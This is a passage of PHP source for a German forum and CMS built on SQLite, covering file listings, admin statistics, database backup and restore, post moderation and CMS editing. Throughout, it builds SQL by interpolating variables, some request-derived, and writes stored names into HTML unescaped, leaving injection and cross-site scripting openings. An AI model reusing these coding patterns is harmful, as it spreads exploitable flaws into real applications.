left join [file] as b on a.link = b.id
where a.status is not null and ifnull(a.type,b.type) like 'text/%'".(($status/2%2) ? "" : " and a.user = $uid")." and a.id = $var[0]"))
$sql['e']($conn,"
update [file] set
type = '".preg_replace('!^([\w/-]+).*$!','$1',$var[0]['type'])."; charset=$val[0]'
where id = ".$var[0]['id']);
}
elseif(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
if($sql['sq']($conn,"select 1+status from [file] where id = $var[0]"))
$sql['e']($conn,"update [file] set status = null where (user = $uid or $status/2%2) and id = $var[0]");
else
$sql['e']($conn,strtr("begin;
update [file] set
size = (select size from [file] where id = #),
hash = (select hash from [file] where id = #),
type = (select type from [file] where id = #),
data = (select data from [file] where id = #)
where id = (select id from [file] where link = # limit 1);
update [file] set link = (select id from [file] where link = # and data is not null)
where link = #;
update [file] set link = null where id = link;
delete from [file] where id = #;
commit;",array('#' => $var[0])));
elseif($status/2%2 and isset($_GET['restore']) and preg_match('/\d+/',$_GET['restore'],$var))
$sql['e']($conn,"
update [file]
set status = 1
where id = $var[0]");
$data = (($status/2%2 and !is_bool($mid)) ? (($mid < 0) ? '' : "where a.user = $mid") : "where a.user = $uid and a.status is not null");
$num = $sql['sq']($conn,"select count(*) from [file] as a $data");
if($page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/Datei?page=#key##max#&user=$mid".(($sort) ? "&sort=$sort" : "")."' title='#var#'>#key#</a>");
if($rows = $sql['aq']($conn,"
select a.name as name,
abs(ifnull(a.size,b.size)) as absize,
a.user||'-'||a.name as flink,
a.id as id,
u.username as uname,
a.ip as ip,
ifnull(a.status/2%2,1) as status,
a.status%2 as right,
a.[create],
ifnull(a.hash,b.hash) as hash,
a.info as info,
ifnull(a.type,b.type) as type,
a.useragent as agent,
a.link as link,
a.user as user,
ifnull(a.size,b.size) as size,
ifnull(length(a.data),0) as truesize,
strftime('%d.%m.%Y %H:%M:%S',a.[create]) as erstellt
from [file] as a
left join [file] as b on a.link = b.id
left join [user] as u on a.user = u.id
$data".preg_replace($sorth[2],$sorth[3],'u.id,a.name;11;a.name')."
limit $val,$max",SQLITE_ASSOC)) {
$row = array(); // user
$val = ($status/2%2 and $mid) ? "&user=$mid" : false;
$key = 0;
foreach($rows as $var)
$row[] = "<tr><td><a href='$self/$request?id=$var[id]$val' title='Bearbeiten'>$var[name]</a></td><td align='right' title='".number_format($var['truesize'],0,',','.')." Bytes'>".number_format((($key += $a = abs($var['size'])) ? $a : 0),0,',','.')."</td>"
."<td><code><a href='$self/file?$var[flink]'>::f/$var[flink]</a></code></td>"
.(($status/2%2) ? "<td title='$var[type]'><code><a href='$self/file?$var[id]'>::f/$var[id]</a>".(($var['link']) ? "#$var[link]" : "")."</code></td><td>".(($var['uname']) ? "<a href='$self/Profil?id=".preg_replace('/-.*$/','',$var['flink'])."'>$var[uname]</a>" : "Unbekannt")."</td><td title='$var[agent]'>$var[ip]</td>" : "")
."<td align='center'>".(($var['status']) ? "Privat" : "<a href='$self?s=d&id=$var[user]&q=".urlencode($var['name'])."'>Öffendlich</a>")."</td><td align='center'>".(($var['right']) ? "Jeder" : ((is_null($var['right'])) ? "<a href='$self/$request?restore=$var[id]$val' title='Wiederherstellen'><font color='#ff0000'><b>Gesperrt</b></font></a>" : "Benutzer"))."</td>"
."<td>$var[erstellt]</td><td title='CRC32' align='center'>".(($var['hash']) ? $var['hash'] : "-/-")."</td><td>"
.@preg_replace(array_keys($creole),array_values($creole),strtr($var['info'],array_slice($html,1)))
." </td><td><a href='$self/$request?kill=$var[id]$val".(($sort) ? "&sort=$sort" : "")."' title='Löschen' onclick='return confirm(\"Wirklich Löschen?\")'><b><font color='#ff0000'>X</font></b></a>";
$out .= "<fieldset><legend><b>Übersicht ".(($status/2%2) ? (($mid and $mid < 0) ? "aller" : "<a href='$self/Datei?user=-1'>aller</a>") : "Ihrer")." hochgeladenen Dateien</b></legend><table border='1'><tr>".((($var = preg_replace($sorth[0],$sorth[1],"Datei=1\tGröße=2\tDatei-Link=3\t(ID-Link=4)\t(Benutzer=5)\t(IP-Adresse=6)\tStatus=7\tRechte=8\tErstellt=9\tHash=10\tBeschreibung=11")) and $status/2%2 and $mid) ? preg_replace('/(?=sort=)/',"user=$mid&",$var) : $var)."<th> </th></tr>".implode("",$row)."</table><h4 align='center'>$code</h4></fieldset>";
}
$row = ($id and $row = $sql['aq']($conn,"
select a.status as status,
a.name as name,
a.info as info,
ifnull(a.type,b.type) as type
from [file] as a
left join [file] as b on a.link = b.id
where a.id = $id")) ? reset($row) : array('name' => '', 'info' => '', 'status' => 1, 'type' => '');
$val = ($status/2%2) ? (($mid == -1) ? array($key,'insgesamt belegt') : array($len,'belegt')) : array($maxfile-$len,'frei');
$out .= "<form name='file' action='$self".(($status/2%2 and $mid) ? "?user=$mid" : "")."' method='post' enctype='multipart/form-data'><table cellspacing='0' cellpadding='0'><tr><td><fieldset><legend><b>Datei-Upload <small>(".number_format(($val[0]),0,',','.')." Bytes $val[1])</small></b></legend>
<table width='100%'><tr><td width='1%'><small>Datei</small><br /><input type='file' name='file' /></td>
<td><small>Dateiname</small><br /><input type='text' name='name' value='$row[name]' style='width:100%' /></td></tr></table>
<table width='100%'><tr><td><small>Beschreibung</small><br /><input type='text' name='info' value='".strtr($row['info'],array_slice($html,1))."' style='width:100%' /></td>
<td><small>Status</small><br /><select name='status' size='1'><option value='0'>Öffendlich</option><option value='2'".(($row['status']/2%2) ? " selected" : "").">Privat</option></select>
<td><small>Rechte</small><br /><select name='right' size='1'><option value='1'>Jeder</option><option value='0'".(($row['status']%2) ? "" : " selected").">Benutzer</option></select>"
.(($status/2%2 and ($row['type'] or is_null($row['type']))) ? "</td><td><small>Content-Type:"
.((preg_match('!^text/!',$row['type'])) ? " (<span onclick='document.file.type.value=document.file.type.value.replace(/^(text\/[\w-]+).*$/,\"$1; charset=iso-8859-1\")'>iso</span> / <span onclick='document.file.type.value=document.file.type.value.replace(/^(text\/[\w-]+).*$/,\"$1; charset=urf-8\")'>utf-8</span>)": '')."</small><br /><input type='text' name='type' value='$row[type]' />"
: ((preg_match('!^text/([\w-]+)(?:;\s*charset\s*=\s*([\w-]+))?$!',$row['type'],$var)) ? "</td><td><small>Charset (<span onclick='document.file.charset.value=\"iso-8859-1\"'>iso</span> / <span onclick='document.file.charset.value=\"utf-8\"'>utf-8</span>)</small><br /><input type='text' name='charset' value='".((isset($var[2])) ? $var[2] : '')."' />" : ""))."</td><td valign='bottom'>
<input type='submit' name='send' value='Hochladen' /></td></tr></table>
<input type='hidden' name='request' value='$request' /><input type='hidden' name='id' value='$id' /><input type='hidden' name='MAX_FILE_SIZE' value='$maxfile' />
</fieldset></td></tr></table></form>";
}
# Administrator Werkzeuge
if($uid and $status/2%2 or $info[3] != '') {
$info[4] = "|>-\n|--[ [[^Backup]] ~| [[^CMS]] ~| [[^SQL|SQL-Konsole]] ~| [[^Status]] ]--|\n";
if(preg_match('/^(cms|backup|sql|status)$/i',$request))
$info[8] = @preg_replace(array_keys($creole),array_values($creole),"$info[4]--");
if($request == 'Status' and array_sum($var = reset(($sql['aq']($conn,"
select (select count(*) from user where status/2%2),
(select count(*) from user where status%2),
(select count(*) from user where status%2 = 0),
(select sum(logins) from user),
(select sum(requests) from user),
(select count(*) from (select count(*) from [user] group by ip having count(*) > 1))",SQLITE_NUM))))) {
$out .= "$info[8]<table align='center'><tr><td colspan='2'><fieldset><legend><b>Allgemein</b></legend>"
."Admins: $var[0] - ".((is_array($val = $sql['sq']($conn,"select Username from user where status/2%2"))) ? implode(", ",$val) : $val)
." / Online: $var[1] / Offline: $var[2] / Logins: ".number_format($var[3],0,',','.')." / Zugriffe: ".number_format($var[4],0,',','.')." / Gleiche IPs: $var[5]</fieldset></td></tr>";
$out .= "<tr><td><fieldset><legend><b>Inhalte</b></legend><table border='1'><tr>"
.preg_replace($sorth[0],$sorth[1],"Art=1\tBenutzer=2\tInsgesamt=3\tÖffendlich=4\tGelöscht=5\tZuerst Erstellt=6\tZuletzt Erstellt=7\tZuletzt Geändert=8")."</tr>";
$row = array();
foreach($sql['aq']($conn,"
select 'Mitglieder',
(select count(profil) from user where status is not null),
(select count(*) from user where status is not null),
(select count(page) from user where status is not null),
(select count(*) from user where status is null),
(select min([create]) from user),
(select max([create]) from user),
(select max(change) from user)
union select 'Blog',
(select count(*) from (select count(*) from forum where status is not null and mailid = userid and mailid is not null group by userid)),
(select count(*) from forum where status is not null and mailid = userid and mailid is not null),
(select count(*) from forum where status%2=0 and mailid = userid and mailid is not null),
(select count(*) from forum where status is null and mailid = userid and mailid is not null),
(select min([create]) from forum where mailid is not null and userid = mailid),
(select max([create]) from forum where mailid is not null and userid = mailid),
(select max([change]) from forum where mailid is not null and userid = mailid)
union select 'Chat',
(select count(user) from chat),
(select count(*) from chat),
(select count(*) from (select distinct u.id from user as c left join user as u on c.chat = u.id where u.id is not null and u.status/4%2 group by u.id)),
null,
(select min(time) from chat),
(select max(time) from chat),
null
union select 'CMS',
(select count(*) from user where status/2%2),
(select count(*) from cms),
(select count(*) from cms where status/8%2),
null,
(select min([create]) from cms),
(select max([create]) from cms),
(select max([change]) from cms)
union select 'Datei',
(select count(*) from (select count(*) from file where status is not null group by user)),
(select count(*) from file where status is not null),
(select count(*) from file where status%2=0),
(select count(*) from file where status is null),
(select min([create]) from file),
(select max([create]) from file),
null
union select 'Mail',
(select count(*) from (select count(*) from forum where status is not null and mailid != userid and mailid is not null group by userid)),
(select count(*) from forum where status is not null and mailid is not null and mailid != userid),
null,
(select count(*) from forum where status is null and mailid is not null and mailid != userid),
(select min([create]) from forum where mailid is not null and userid != mailid),
(select max([create]) from forum where mailid is not null and userid != mailid),
(select max([change]) from forum where mailid is not null and userid != mailid)
union select 'Forum',
(select count(*) from (select count(*) from forum where status is not null and mailid is null group by userid)),
(select count(*) from forum where status is not null and mailid is null),
(select count(*) from forum where status%2=0 and mailid is null),
(select count(*) from forum where status is null and mailid is null),
(select min([create]) from forum where mailid is null),
(select max([create]) from forum where mailid is null),
(select max([change]) from forum where mailid is null)".preg_replace($sorth[2],$sorth[3],"1;8"),SQLITE_NUM) as $line)
if($line[2]) {
$out .= "<tr>";
foreach($line as $key => $var)
$out .= "<td".(($key) ? ((preg_match('/^\d*$/',$var)) ? " align='center'>".((is_null($var)) ? "-/-" : $var)
: ">".preg_replace('/(\d+)-(\d+)-(\d+) (\d+):(\d+):(\d+)/','$3.$2.$1 $4:$5',$var)) : "><a href='$self/$var'><b>$var</b></a>")."</td>";
$out .= "</tr>";
}
$out .= "</table></fieldset></td></tr></table>";
}
if($request == 'Backup') { // Backup Database
$var = (isset($_FILES['sqlite']['tmp_name']) and !$_FILES['sqlite']['error'] and file_exists($_FILES['sqlite']['tmp_name'])) ? $_FILES['sqlite']['tmp_name'] : "$base.gz";
if($query == 'reorg')
$sql['e']($conn,"vacuum");
elseif(isset($_POST['create']) and (!file_exists("$base.gz") or $owbu) and ($fr=fopen($base,'rb')) and ($fw=$gz['open']("$base.gz",'wb9'))) {
while(!feof($fr))
$gz['write']($fw,fread($fr,1024));
fclose($fr);
$gz['close']($fw);
}
if($var != "$base.gz" or isset($_POST['reset'])) { // Restore
$sql['cl']($conn);
if(($fr=$gz['open']($var,'rb')) and ($fw=fopen($base,'wb'))) {
while(!$gz['eof']($fr))
fwrite($fw,$gz['read']($fr,1024));
$gz['close']($fr);
fclose($fw);
@touch($base,filemtime($var));
header("Location: $self");
die("Weiter zum <a href='$self'>Forum</a>");
}
}
elseif(isset($_GET['download']) and file_exists($var = preg_replace('/\/.*$/','',$base)."/".basename($_GET['download']).strrchr($base,'.')) and is_file($var)) { // Save Fail-DB
header('Content-Type: application/octetstream');
header('Content-Disposition: filename="'.basename($var).'"');
header('Content-Length: '.filesize($var));
readfile($var);
exit();
}
elseif(isset($_POST['backup']) or $query == 'download') { // Save DB
$var = ($query and file_exists("$base.gz")) ? file_get_contents("$base.gz") : $gz['encode'](file_get_contents($base),9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.basename($base).'.gz"');
header('Content-Length: '.strlen($var));
die($var);
}
elseif(isset($_REQUEST['sqldump']) and $tables = $sql['q']($conn,"select name,sql from sqlite_master where type='table' and name not like 'sqlite_%'")) { // Make SQL-Dump
$eol = "\r\n";
$val = "begin;$eol";
while($table = $sql['fa']($tables,SQLITE_ASSOC)) {
$val .= ((isset($_REQUEST['dt'])) ? ((isset($_REQUEST['ct'])) ? "drop table" : "delete from")." [$table[name]];$eol" : "")
.((isset($_REQUEST['ct'])) ? "$table[sql];" : "/* ".$table['sql']." */").$eol;
if($lines = $sql['q']($conn,"select * from [$table[name]]")) {
$cols = $sql['nf']($lines);
$name = array();
for($a=0; $a<$cols; $a++)
$name[] = "[".$sql['fn']($lines,$a)."]";
while($line = $sql['fa']($lines,SQLITE_NUM)) {
foreach($line as $key => $var)
$line[$key] = (is_null($var)) ? 'null' : ((preg_match('/^(0|-?[1-9]\d*(\.\d+)?)$/',$var)) ? $var : "'".$sql['es']($var)."'");
$val .= "insert into [$table[name]] (".implode(",",$name).") values (".implode(",",$line).");$eol";
}
}
}
$val = $gz['encode']($val."commit;$eol",9);
header('Content-Type: application/x-gzip');
header('Content-Disposition: filename="'.preg_replace('/(?<=\.)\w+$/','sql',basename($base)).'.gz"');
header('Content-Length: '.strlen($val));
die($val);
}
else
$out .= "$info[8]<table align='center'><tr><td><fieldset><legend><b>Datenbank Backup</b></legend>
<table align='right'><tr><td><small><a href='$self/SQL' title='SQL-Konsole'>".basename($base)."</a><br /><a href='$self/Backup?reorg' title='Datenbank reorganisieren'>".number_format(filesize($base),0, '.', ',')." Bytes</a></small></td></tr></table>
<form name='save' action='$self/Backup' method='post'><small>SQLite-Binary:</small><br /><input type='submit' name='backup' value='Herunterladen' /><br clear='all' /><br />
<table width='100%'><tr><td><small>SQL-Dump:</small><br /><input type='submit' name='sqldump' value='Erstellen' /></td><td>
<input type='checkbox' id='ct' name='ct' value='1' checked /><label for='ct'><small>Tabellen neu erstellen</small></label><br />
<input type='checkbox' id='dt' name='dt' value='1' /><label for='dt'><small>Alte Tabellen löschen/leeren</small></label></td></tr></table></form>"
.((file_exists("$base.gz")) ? "<hr /><table align='right'><tr><td align='right'><small><a href='$self/Backup?download'>".basename($base).".gz</a><br />vom: ".date("d.m.Y H:i:s",filemtime("$base.gz"))."</small></td></tr></table>
<form name='reset' action='$self/Backup' method='post'><small>Letzte Sicherung:</small><br /><input type='submit' name='reset' value='Zurückspielen' /></form>" : "")
.((!file_exists("$base.gz") or $owbu) ? "<form name='create' action='$self/Backup' method='post'><table width='100%'><tr><td><small>Sicherung:</small></td><td align='right'><input type='submit' name='create' value='Erstellen' /></tr></table></form>" : "")
.(($val = glob(preg_replace('/(?=\.\w+$)/','_*',$base))) ? "<hr /><small>Defekte Datenbanken:<br />".implode("<br />",preg_replace('/^((.*?)_(\d\d)(\d\d)(\d\d)(\d\d)(\d\d)(\d\d))(\.\w+)$/',"<a href='$self/Backup?download=$1'>$2$9</a> vom: $5.$4.$3 $6:$7:$8",$val))."</small>" : '')
."<hr /><form enctype='multipart/form-data' name='load' action='$self/Backup' method='post'><small>Hochladen & Zurückspielen:</small><br />
<input type='hidden' name='MAX_FILE_SIZE' value='".(preg_replace('/\D/','',ini_get('upload_max_filesize'))*1024*1024)."' />
<input type='file' name='sqlite' size='24' /><br /><input type='submit' value='Hochladen' /></form></fieldset></td></tr></table>";
}
# Administration von Forenbeträgen
if($request == 'Admin') {
if(isset($_GET['kill']) and preg_match('/\d+/',$_GET['kill'],$var))
$sql['e']($conn,"delete from [forum] where id=$var[0]");
elseif(isset($_GET['lock']) and preg_match('/\d+/',$_GET['lock'],$var))
$sql['e']($conn,"update [forum] set status=null where status is not null and id=$var[0]");
elseif(isset($_GET['save']) and preg_match('/\d+/',$_GET['save'],$var))
$sql['e']($conn,"update [forum] set status=0 where status is null and id=$var[0]");
if(isset($_GET['edit']) and preg_match('/\d+/',$_GET['edit'],$var)) {
if(isset($_POST['edit']) and isset($_POST['message']) and $_POST['message'] != '') {
$sql['e']($conn,"
update [forum] set change=datetime('now','localtime'),
changes=changes+1,
title=nullif('".((isset($_POST['title'])) ? $sql['es'](strtr($_POST['title'],$html)) :'')."',''),
message='".$sql['es'](strtr($_POST['message'],$html))."',
status=nullif('".preg_replace('/\D/','',$_POST['status'])."',''),
userid=".preg_replace('/\D/','',$_POST['userid']).",
mailid=nullif('".preg_replace('/\D/','',$_POST['mailid'])."',''),
path=nullif('".preg_replace('/[^\d\/]/','',$_POST['path'])."','')
where id=$var[0]");
$request = ($mid or $_POST['mailid']) ? (($_POST['mailid'] == $_POST['userid']) ? 'Blog' : 'Mail') : '';
if(!$q)
$q = $var[0];
}
else {
$wrt = array();
if($getopt != '')
$wrt[] = $getopt;
if($page[1] != '')
$wrt[] = $page[1];
$wrt = "$self/Admin?".implode('&',$wrt).((count($wrt) > 0) ? '&' : '');
$line = reset(($sql['aq']( $conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.userid as userid,
f.mailid as mailid,
f.ip as uip,
f.useragent as ua,
f.status as status,
ifnull(f.status%2,'-1') as right,
f.path as path,
f.title as title,
f.message as message,
u.username as author
from [forum] as f
left join [user] as u on u.id = f.userid
where f.id=$var[0]",SQLITE_ASSOC)));
foreach($_POST as $k => $v)
if(preg_match('/^(title|message|userid|mailid|path|status)$/',$k))
$line[$k] = $v;
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $line['id'], 'name' => $line['id'], 'title' => $line['title'], 'from' => $line['author'], 'create' => $line['create'], 'change' => $line['change'], 'right' => $line['right']));
$array = array();
foreach($sql['aq']($conn,"select id,username from user") as $v) {
$array['user'][] = "<option value='$v[id]'".(($line['userid'] == $v['id']) ? " selected" : "").">$v[username]</option>";
$array['mail'][] = "<option value='$v[id]'".(($line['mailid'] == $v['id']) ? " selected" : "").">$v[username]</option>";
if($v['id'] == $line['userid'])
$line['from'] = $v['username'];
if($v['id'] == $line['mailid'])
$line['to'] = $v['username'];
}
$out .= "<form action='$wrt"."edit=$var[0]' method='post'><fieldset class='cr'><legend>"
.((is_null($line['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),preg_replace($phtml[0],$phtml[1],$line['title']))."</b>")." von "
.((!isset($line['from']) or is_null($line['from'])) ? "Unbekannt" : "<a href='$self/Profil?id=$line[userid]'>$line[from]</a>")
.((!isset($line['to']) or is_null($line['to'])) ? "" : " an <a href='$self/Profil?id=$line[mailid]'>$line[to]</a> [<font color='#".((floor($line['status']/2)) ? "00a000'>" : "a00000'>un")."gelesen</font>]")
." <b><a href='#edit'>Bearbeiten</a></b> <small>(<a href='$self/Source?q=$var[0]'>Quelltext</a>)</small></legend><small>Metainformationen:</small><br />
Erstellt: $line[crdatum] / Zuletzt geändert: $line[chdatum] / Änderungen: $line[changes]<br>
IP: ".strtr($line['uip'],$html)." / Useragent: ".strtr($line['ua'],$html)." / Status: ".((is_null($line['status'])) ? "<font color='#ff0000'>Gesperrt</font> <small>(<a href='$wrt"."save=$var[0]'>Entsperren"
: "Normal <small>(<a href='$wrt"."lock=$var[0]'>Sperren")."</a> | <a href='$wrt"."kill=$var[0]'>Löschen</a>)</small>"
.((is_null($line['path'])) ? "" : " / <a href='$self".(($mid) ? "/Mail?user=$mid&" : "?")."q=".preg_replace('!^.*/(\d+)/$!','$1',$line['path'])."'>Reference suchen</a>")."<hr />"
.@preg_replace(array_keys($creole),array_values($creole),strtr($line['message'],array_slice($html,1)))."<br clear='all' /><hr /><a name='edit' /><table width='100%'><tr>
<td width='99%'><small>Titel:</small><br /><input type='text' name='title' value='".preg_replace($phtml[0],$phtml[1],$line['title'])."' style='width:100%' /></td>
<td><small>Von:</small><br /><select name='userid' size='1'><option value='0'>Unbekannt</option>".implode('',$array['user'])."</select></td>
<td><small>An:</small><br /><select name='mailid' size='1'><option value=''>Forum</option>".implode('',$array['mail'])."</select></td>
<td><small>Status:</small><br /><input type='text' size='1' name='status' value='".preg_replace('/\D/','',$line['status'])."' /></td>
<td><small>Path:</small><br /><input type='text' size='10' name='path' value='".preg_replace('/[^\d\/]/','',$line['path'])."' /></td></tr>
<tr><td colspan='5'><small>Nachricht:</small><br /><textarea style='width:100%' name='message' cols='80' rows='$taz'>".preg_replace($phtml[0],$phtml[1],$line['message'])."</textarea><br />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='edit' value='Speichern' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbruch' /></td></tr></table></fieldset></form><script type='text/javascript'><!--
document.forms[0].message.focus()//--></script>";
}
}
else
$request = '';
}
}
elseif(preg_match('/Admin|Backup/',$request))
$request = '';
# Content-Management-System
if((($request == 'CMS' or isset($_REQUEST['request']) and $_REQUEST['request'] == 'CMS') and $uid) and ($status/2%2 or $status%2 == 1 and $sql['sq']($conn,"select status/2%4 from [cms] where id like '$id' or name like '".$sql['es'](trim($q))."'") == 2)) {
if(count($_POST) and !isset($_POST['stop'])) {
$post = array('name' => '\w.-', 'content' => '^\x00');
if($status/2%2)
$post = array_merge($post,array('description' => '^\n', 'menu' => '\d', 'public' => '\d', 'right' => '\d-', 'id' => '\d', 'create' => '\d', 'change' => '\d'));
foreach($post as $key => $var)
$post[$key] = (isset($_POST[$key]) and preg_match('/['.$var.']+/',$_POST[$key],$val)) ? strtr($val[0],$html) : false;
if(isset($_POST['save']) and $_POST['save'] and isset($_POST['name']) and !preg_match("/^\s*$ncms\s*$/",$_POST['name'])) {
if($status/2%2)
$var = (int)$post['right']*2 + ((isset($post['menu'])) ? $post['menu'] : 0) + ((isset($post['public'])) ? $post['public']*8 : 0);
if($id)
$sql['e']($conn,"
update [cms] set
change=datetime('now','localtime'),
changes=changes+1,".(($status/2%2) ? "
status=$var,
name='$post[name]',
description=nullif('".$sql['es']($post['description'])."','')," : "")."
content=nullif('".$sql['es']($post['content'])."','')
where id = $id");
elseif($status/2%2)
$sql['e']($conn,"
insert into [cms] ([create],[change],[status],[name],[description],[content])
values( datetime('now','localtime'),datetime('now','localtime'),
$var,
'$post[name]',
nullif('".$sql['es']($post['description'])."',''),
nullif('".$sql['es']($post['content'])."',''))");
$id = $content = true;
$request = ($post['name'] != '') ? "$post[name] " : ' ';
}
elseif(isset($_POST['remove']) and $id and $status/2%2) {
$sql['e']($conn,"delete from [cms] where id = $id");
$id = $post = false;
}
}
else
$post = false;
if(!$id and $q !== false)
$id = $sql['sq']($conn,"select id from [cms] where name like '".$sql['es']($q)."'");
if(!$post and $id and $var = $sql['aq']($conn,"
select id,
name,
strftime('%s',change) as change,
strftime('%s',[create]) as 'create',
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
content
from [cms]
where id = $id",SQLITE_ASSOC))
$post = reset($var);
elseif(!$post)
$post = array('id' => 0, 'name' => '', 'menu' => 0, 'public' => 0, 'right' => -2, 'description' => '', 'content' => '', 'create' => '', 'change' => '');
if(count($_POST) and $post['content'] != '' and $creolevar = array_merge($creolevar,array('type' => 'cms', 'id' => $post['id'], 'name' => $post['name'], 'create' => $post['create'],
'change' => $post['change'], 'name' => $post['name'], 'title' => $post['description'], 'right' => $post['right'], 'from' => $sql['sq']($conn,'select username from user where status/2%2 = 1'))))
$out .= "<div class='cr'>".@preg_replace(array_keys($creole),array_values($creole),strtr($post['content'],array_slice($html,1)))."</div>";
if($id or isset($post['id']))
$uedit = "CMS?id=".((isset($post['id'])) ? $post['id'] : $id);
if($id === false) {
$num = $sql['sq']($conn,"select count(*) from [cms]");
if($page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/CMS?page=#key##max#".(($sort) ? "&sort=$sort" : "")."' title='#var#'>#key#</a>");
if($rows = $sql['aq']($conn,"
select id,
name,
[create],
change,
changes,
status%2 as menu,
status/8%2 as public,
status/2%4 as right,
description,
strftime('%d.%m.%Y %H:%M:%S',[create]) as erstellt,
strftime('%d.%m.%Y %H:%M:%S',change) as modifiziert
from [cms]".preg_replace($sorth[2],$sorth[3],"name;9;name")."
limit $val,$max")) {
$row = array();
foreach($rows as $var)
$row[] = "<tr><td><a href='$self/CMS?id=$var[id]'>$var[id]</a></td><td><a href='$self".(($var['name'] == '') ? "'>Startseite" : "/$var[name]'>$var[name]" )."</a></td><td>$var[erstellt]</td><td>$var[modifiziert]</td><td align='center'>$var[changes]</td><td align='center'>".strtr($var['menu'],array(0 => 'Aus', 1 => 'An'))."</td><td align='center'>".strtr($var['public'],array(0 => 'Aus', 1 => 'An'))."</td><td align='center'>".strtr($var['right'],array(0 => 'Jeder' , 1 => 'Benutzer', 2 => 'Benutzer+', 3 => 'Admin'))."</td><td>".strtr($var['description'],array_slice($html,1))." </td></tr>";
$out .= "$info[8]<fieldset><legend><b>Übersichtsliste für Content-Management-System</b></legend><table border='1'><tr>".preg_replace($sorth[0],$sorth[1],"ID=1\tSeite=2\tErstellt=3\tZuletzt Geändert=4\tGeändert=5\tMenü=6\tÖffendlich=7\tRechte=8\tBeschreibung=9")."</tr>".implode("",$row)."</table><div align='right'><a href='$self/CMS?id=0'>Neue Seite erstellen</a></div><h4 align='center'>$code</h4></fieldset>";
}
}
elseif($id === false)
$id = 0;
if(isset($_POST['stop'])) {
$id = $content = true;
$request = ($post['name'] != '') ? $post['name'] : ' ';
}
if($id !== false and $id !== true) {
if($status/2%2) {
$array = array(3 => 'Admin (Voll)', 2 => 'Benutzer (Edit)', 1 => 'Benutzer (Lesen)', 0 => 'Jeder (Lesen)');
foreach($array as $key => $var)
$array[$key] = "<option value='$key'".(($post['right'] == $key) ? " selected" : "").">$var</option>";
}
if(isset($_POST['content']) and $_POST['content'] != '')
$out .= '<br />';
$out .= "<a name='edit'></a><form action='$self/CMS?id=$id' method='post' name='cms'><fieldset class='cr'><legend><b>Content-Management-System</b> <small>(<a href='#edit'>edit</a>)</small></legend><table width='100%' border='0'>".(($status/2%2) ? "<tr><td width='20%'>
<small>Seite:</small><br /><input type='text' name='name' value='$post[name]' style='width:100%' /></td><td width='70%'>
<small>Beschreibung:</small><br /><input type='text' name='description' value='".strtr($post['description'],array_slice($html,1))."' style='width:100%' /></td><td width='5%' nowrap>
<small>Optionen:</small><br /><input type='checkbox' name='menu' id='menu' value='1'".(($post['menu'] > 0) ? " checked" : "")." /><label for='menu'>Menü</label>
<input type='checkbox' name='public' id='public' value='1'".(($post['public'] > 0) ? " checked" : "")." /><label for='public'>Öffendlich</label></td><td width='5%'>
<small>Rechte:</small><br /><select name='right' size='1'>".implode('',$array)."</select></td></tr>" : "<input type='hidden' name='name' value='$post[name]' />")."<tr><td colspan='4'>
<small>Nachricht:</small><br /><textarea style='width:100%' name='content' cols='80' rows='$taz'>$post[content]</textarea><br />
<input type='hidden' name='id' value='$post[id]' />
<input type='hidden' name='create' value='$post[create]' />
<input type='hidden' name='change' value='$post[change]' />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='save' value='Speichern' /> ".(($status/2%2) ? "<input type='submit' name='remove' value='Löschen' onclick='return confirm(\"Wirklich Löschen?\")' /> " : "")."<input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbruch' /></td></tr></table></fieldset></form><script type='text/javascript'><!--
document.cms.".(($post['content']) ? 'content' : 'name').".focus();//--></script>";
}
}
}
}
# Creole-Syntax ausgeben
if((preg_match('/Admin|Beitrag|Bearbeiten/',$request) or $request == 'CMS' and (isset($_GET['id']) or isset($_GET['q'])) and !isset($_REQUEST['remove']))
and ($uid or $gast) or $request == 'Creole' and !isset($_REQUEST['nodemo'])) {
$creolevar = array_merge($creolevar,array('type' => 'intern'));
$val = array("**Fett**","//Kursiv//","++Größer++","--Kleiner--","~~Durchgestrichen~~","__Unterstrichen__",
"##Druckschrift##","^^Hoch^^ gestellt",",,Tief,, gestellt","**//__Kombiniert__//**","@@**Fett** ~//Code//@@",
"===Überschrift 3","* List\n** Unter\n* Punkt","# List\n## Unter\n# Zahl","; List\n: Info\n;; Rekursiv\n:: Info",
"[[[Einfacher\nUmbruch]]]","Um\\\\bruch aus~\\\\setzen","^CMS CreoleLink","http://www.xx","mail@www.xx",
"[[http://www.xx|title]]","[[back->http://www.xx]]"," Plaintext","----","{{/favicon.ico|Ikone}}","{{{**//Plain//**}}}",
"??key:value?? / ??key??","<<echo str='foo bar'>>",". <<<_ nix>>> /* nix */","|>\n|=Tabelle|=Titel|\n|Spalte |Zelle |");
foreach($val as $key => $var)
$val[$key] = "<tr><td><pre>".strtr($var,array_slice($html,1))."</pre></td><td>".str_replace("\n",'<br />',@preg_replace(array_keys($creole),array_values($creole),$var))."</td></tr>";
$out = "<table align='right' id='crs' style='display:none'><tr><td><a href='#' title='Tabelle einblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('crh').style.display = 'block';
document.getElementById('crs').style.display = 'none';
document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) ? (x[2] & 65535-(1<<1)) + (1<<1) * 0 : 0) + '; path=$self';
return false;
"),array('&' => '&', "'" => '"'))."'>«</a></td></tr></table>
<table align='right' border='1' class='cr' id='crh'><tr><td colspan='2'>
<table align='right' cellpadding='0' cellspacing='0' style='display:none' id='cra'><tr><td><a href='#' title='Tabelle ausblenden' onclick='".strtr(preg_replace($js,'',"
document.getElementById('crh').style.display = 'none';
document.getElementById('crs').style.display = 'block';
